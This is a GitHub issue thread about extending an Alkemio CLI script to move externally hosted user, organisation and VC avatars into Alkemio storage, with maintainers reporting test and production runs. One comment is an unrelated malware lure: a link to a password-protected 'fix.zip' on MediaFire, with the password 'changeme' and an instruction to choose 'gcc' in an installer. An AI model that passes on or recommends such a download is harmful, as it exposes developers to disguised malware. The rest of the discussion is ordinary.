### ISSUE TITLE
User avatar script to trigger conversion for external hosted avatars

### ISSUE THREAD

**Issue by techsmyth** [alkem-io/cli#69]
## Description
Extend the `users-avatar-excel` script to replace the 3rd party hosted avatars with ones stored in Alkemio storage.

e.g. `https://eu.ui-avatars.com/api/?name=D+D&background=6e0323&color=ffffff` should be downloaded, then uploaded and provided with https://acc-alkem.io/api/private/rest/storage/document/[id]

## Acceptance criteria

- [ ] Extend `users-avatar-excel` to optionally trigger the mutation to have the avatars stored on Alkemio;
- [ ] Run against **Acceptance** so that all Avatars are stored on the platform;
- [ ] Run against **Production** so that all Avatars are stored on the platform;

## Additional Context
Note, that the script already exists and currently it creates an Excel with sheets - Inaccessible Avatars | Non Alkemio Avatars | Default Avatars | Alkemio Avatars.

This tasks aims to move all **Default Avatars** (using eu-.ui.avatar service) to **Alkemio Avatars**.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Comoque1** [comment]
With @bobbykolev  tested the script against ACC env. and the users avatars are now moved under Alkemio.
The change might be good to be applied against organizations as well: <img width="1675" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBMXZJQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--c93751274a7777eba29dde04286ec19cf520f7d6/image.png" alt="image.png" />

**Comment by techsmyth** [comment]
Agreed those should also be done for Orgs, and also VCs. Simple enough adjustment to script I think...server mutation works with a profile so also will work for orgs & vc profiles

**Comment by bobbykolev** [comment]
The script was updated and ran against ACC. All contributor's visuals were updated*. There was something strange only for Orgs.
Some of the Alkemio-hosted visuals are not publicly accessible throwing 403.

**Comment by techsmyth** [comment]
Thanks, if not accessible then please generate a new avatar url based on external service & then trigger storage on Alkemio...

**Comment by bobbykolev** [comment]
The script was applied to PROD.
All VCs, ORGs, and Users now have avatars stored on Alkem.io.

There were a couple of issues related to the support of only PNGs but some of the assets were in other formats. However, with some tweaking and manual changes with the scripts, almost all default avatars were updated.
